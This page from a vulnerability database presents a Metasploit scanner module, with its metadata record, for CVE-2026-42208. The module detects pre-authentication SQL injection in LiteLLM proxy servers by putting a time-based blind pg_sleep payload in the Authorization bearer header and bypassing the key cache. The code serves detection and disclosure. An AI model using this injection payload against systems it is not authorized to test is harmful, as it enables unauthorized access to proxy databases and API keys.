BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner_MSF:AUXILIARY-SCANNER-HTTP-LITELLM_PROXY_SQLI-

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This module detects BerriAI LiteLLM proxy servers affected by CVE-2026-42208, an unauthenticated SQL injection. During API-key verification the proxy interpolates the raw Authorization bearer value into a PostgreSQL query WHERE v.token = '' without...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-SCANNER-HTTP-LITELLM_PROXY_SQLI-

Published Jun 24, 2026 at 19:04

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::SQLi

def initialize(info = {})
super(
update_info(
info,
'Name' => 'BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner',
'Description' => %q{
This module detects BerriAI LiteLLM proxy servers affected by
CVE-2026-42208, an unauthenticated SQL injection. During API-key
verification the proxy interpolates the raw Authorization bearer value
into a PostgreSQL query (WHERE v.token = '<token>') without
parameterization. Because LiteLLM only hashes tokens that begin with
"sk-", a bearer value that does not start with "sk-" reaches the query
verbatim and is injectable. The failure path that performs the lookup is
reachable before authentication. Affected versions are 1.81.16 through
1.83.6 (fixed in 1.83.7).

The module confirms the flaw with a benign time-based check built on the
framework's PostgreSQL time-based blind SQL injection library. It issues a
request whose injected predicate sleeps only when a tautology is true and a
second request whose predicate never sleeps, and reports the target
vulnerable only when the first is delayed while the second returns promptly.
A server that is merely slow delays both requests and is not flagged. The
module does not read or exfiltrate data.

Detection requires the target to have provisioned at least one virtual
key. The injectable predicate sits in a WHERE clause that PostgreSQL
evaluates only against matching rows, so when the token table is empty
the pg_sleep never executes and the proxy appears (falsely) safe. Any
LiteLLM proxy in real use has issued keys; a freshly initialized proxy
with an empty token table may not respond to the time-based probe.
},
'Author' => [
'Tencent YunDing Security Lab', # vulnerability discovery
'Kenneth LaCroix' # Metasploit module
],
'References' => [
['CVE', '2026-42208'],
['GHSA', 'r75f-5x8p-qvmc'],
['URL', 'https://bishopfox.com/blog/cve-2026-42208-pre-authentication-sql-injection-in-litellm-proxy']
],
'DisclosureDate' => '2026-04-20',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
},
'DefaultOptions' => { 'RPORT' => 4000, 'SSL' => false }
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The LiteLLM chat completions endpoint', '/v1/chat/completions']),
OptString.new('MODEL', [true, 'Model name placed in the request body (need not be a real model)', 'gpt-3.5-turbo'])
]
)

# Msf::Exploit::SQLi registers SqliDelay with a 1.0s default. A single second
# is easily lost in network jitter for a remote time-based check, so raise the
# default to give a clearer signal while still letting the user tune it.
register_advanced_options(
[
OptFloat.new('SqliDelay', [false, 'Seconds to pg_sleep for the time-based check', 5.0])
]
)
end

# Best-effort fingerprint via the unauthenticated /health endpoint.
def fingerprint
res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri('health'))
return nil unless res

key = res.headers.keys.find { |k| k.casecmp?('x-litellm-version') }
return "LiteLLM #{res.headers[key]}" if key
return 'LiteLLM /health' if res.code == 200

nil
end

# pg_sleep is evaluated once per matching row, so a populated token table can
# delay the response by several multiples of SqliDelay; add a fixed margin for
# the network round-trip on top of that.
def request_timeout
(datastore['SqliDelay'] * 4 + 20).ceil
end

# Builds the time-based blind SQLi probe. The framework library hands our block
# the boolean predicate to test; we break out of the WHERE v.token = '<token>'
# string literal, OR in that predicate, and comment out the trailing quote. A
# bearer that does not begin with "sk-" is interpolated verbatim, so the quote
# reaches the query and the injection lands. The random suffix sits inside the
# SQL comment (so it is inert) but makes every bearer unique, which defeats
# LiteLLM's in-memory API-key auth cache: a repeated token would otherwise be
# served from cache and skip the database, suppressing the pg_sleep.
def create_litellm_sqli
create_sqli(dbms: PostgreSQLi::TimeBasedBlind) do |payload|
body = {
'model' => datastore['MODEL'],
'messages' => [{ 'role' => 'user', 'content' => 'x' }],
'max_tokens' => 1
}.to_json
send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/json',
'headers' => { 'Authorization' => "Bearer ' OR #{payload}-- #{Rex::Text.rand_text_alphanumeric(8)}" },
'data' => body
},
request_timeout
)
end
end

def check_host(_ip)
fp = fingerprint
if create_litellm_sqli.test_vulnerable
Exploit::CheckCode::Vulnerable("Time-based SQL injection via Authorization header confirmed#{fp ? " (#{fp})" : ''}")
else
Exploit::CheckCode::Safe('No time-based SQL injection signal observed')
end
end

def run_host(ip)
code = check_host(ip)
unless code == Exploit::CheckCode::Vulnerable
print_status("#{peer} - #{code.message}")
return
end

print_good("#{peer} - #{code.message}")
report_vuln(
host: rhost,
port: rport,
name: name,
info: 'Time-based blind SQLi via Authorization header (pg_sleep)',
refs: references
)
end
end

{
    "lastseen": "2026-06-24T19:36:58",
    "description": "This module detects BerriAI LiteLLM proxy servers affected by CVE-2026-42208, an unauthenticated SQL injection. During API-key verification the proxy interpolates the raw Authorization bearer value into a PostgreSQL query WHERE v.token = '' without...",
    "published": "2026-06-24T19:04:51",
    "modified": "2026-06-24T19:04:51",
    "type": "metasploit",
    "title": "BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-SCANNER-HTTP-LITELLM_PROXY_SQLI-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-42208"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Auxiliary::Scanner\n  include Msf::Auxiliary::Report\n  include Msf::Exploit::SQLi\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'BerriAI LiteLLM Proxy Pre-Auth SQL Injection Scanner',\n        'Description' => %q{\n          This module detects BerriAI LiteLLM proxy servers affected by\n          CVE-2026-42208, an unauthenticated SQL injection. During API-key\n          verification the proxy interpolates the raw Authorization bearer value\n          into a PostgreSQL query (WHERE v.token = '<token>') without\n          parameterization. Because LiteLLM only hashes tokens that begin with\n          \"sk-\", a bearer value that does not start with \"sk-\" reaches the query\n          verbatim and is injectable. The failure path that performs the lookup is\n          reachable before authentication. Affected versions are 1.81.16 through\n          1.83.6 (fixed in 1.83.7).\n\n          The module confirms the flaw with a benign time-based check built on the\n          framework's PostgreSQL time-based blind SQL injection library. It issues a\n          request whose injected predicate sleeps only when a tautology is true and a\n          second request whose predicate never sleeps, and reports the target\n          vulnerable only when the first is delayed while the second returns promptly.\n          A server that is merely slow delays both requests and is not flagged. The\n          module does not read or exfiltrate data.\n\n          Detection requires the target to have provisioned at least one virtual\n          key. The injectable predicate sits in a WHERE clause that PostgreSQL\n          evaluates only against matching rows, so when the token table is empty\n          the pg_sleep never executes and the proxy appears (falsely) safe. Any\n          LiteLLM proxy in real use has issued keys; a freshly initialized proxy\n          with an empty token table may not respond to the time-based probe.\n        },\n        'Author' => [\n          'Tencent YunDing Security Lab', # vulnerability discovery\n          'Kenneth LaCroix' # Metasploit module\n        ],\n        'References' => [\n          ['CVE', '2026-42208'],\n          ['GHSA', 'r75f-5x8p-qvmc'],\n          ['URL', 'https://bishopfox.com/blog/cve-2026-42208-pre-authentication-sql-injection-in-litellm-proxy']\n        ],\n        'DisclosureDate' => '2026-04-20',\n        'License' => MSF_LICENSE,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [],\n          'SideEffects' => [IOC_IN_LOGS]\n        },\n        'DefaultOptions' => { 'RPORT' => 4000, 'SSL' => false }\n      )\n    )\n\n    register_options(\n      [\n        OptString.new('TARGETURI', [true, 'The LiteLLM chat completions endpoint', '/v1/chat/completions']),\n        OptString.new('MODEL', [true, 'Model name placed in the request body (need not be a real model)', 'gpt-3.5-turbo'])\n      ]\n    )\n\n    # Msf::Exploit::SQLi registers SqliDelay with a 1.0s default. A single second\n    # is easily lost in network jitter for a remote time-based check, so raise the\n    # default to give a clearer signal while still letting the user tune it.\n    register_advanced_options(\n      [\n        OptFloat.new('SqliDelay', [false, 'Seconds to pg_sleep for the time-based check', 5.0])\n      ]\n    )\n  end\n\n  # Best-effort fingerprint via the unauthenticated /health endpoint.\n  def fingerprint\n    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri('health'))\n    return nil unless res\n\n    key = res.headers.keys.find { |k| k.casecmp?('x-litellm-version') }\n    return \"LiteLLM #{res.headers[key]}\" if key\n    return 'LiteLLM /health' if res.code == 200\n\n    nil\n  end\n\n  # pg_sleep is evaluated once per matching row, so a populated token table can\n  # delay the response by several multiples of SqliDelay; add a fixed margin for\n  # the network round-trip on top of that.\n  def request_timeout\n    (datastore['SqliDelay'] * 4 + 20).ceil\n  end\n\n  # Builds the time-based blind SQLi probe. The framework library hands our block\n  # the boolean predicate to test; we break out of the WHERE v.token = '<token>'\n  # string literal, OR in that predicate, and comment out the trailing quote. A\n  # bearer that does not begin with \"sk-\" is interpolated verbatim, so the quote\n  # reaches the query and the injection lands. The random suffix sits inside the\n  # SQL comment (so it is inert) but makes every bearer unique, which defeats\n  # LiteLLM's in-memory API-key auth cache: a repeated token would otherwise be\n  # served from cache and skip the database, suppressing the pg_sleep.\n  def create_litellm_sqli\n    create_sqli(dbms: PostgreSQLi::TimeBasedBlind) do |payload|\n      body = {\n        'model' => datastore['MODEL'],\n        'messages' => [{ 'role' => 'user', 'content' => 'x' }],\n        'max_tokens' => 1\n      }.to_json\n      send_request_cgi(\n        {\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path),\n          'ctype' => 'application/json',\n          'headers' => { 'Authorization' => \"Bearer ' OR #{payload}-- #{Rex::Text.rand_text_alphanumeric(8)}\" },\n          'data' => body\n        },\n        request_timeout\n      )\n    end\n  end\n\n  def check_host(_ip)\n    fp = fingerprint\n    if create_litellm_sqli.test_vulnerable\n      Exploit::CheckCode::Vulnerable(\"Time-based SQL injection via Authorization header confirmed#{fp ? \" (#{fp})\" : ''}\")\n    else\n      Exploit::CheckCode::Safe('No time-based SQL injection signal observed')\n    end\n  end\n\n  def run_host(ip)\n    code = check_host(ip)\n    unless code == Exploit::CheckCode::Vulnerable\n      print_status(\"#{peer} - #{code.message}\")\n      return\n    end\n\n    print_good(\"#{peer} - #{code.message}\")\n    report_vuln(\n      host: rhost,\n      port: rport,\n      name: name,\n      info: 'Time-based blind SQLi via Authorization header (pg_sleep)',\n      refs: references\n    )\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/litellm_proxy_sqli.rb",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/litellm_proxy_sqli/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply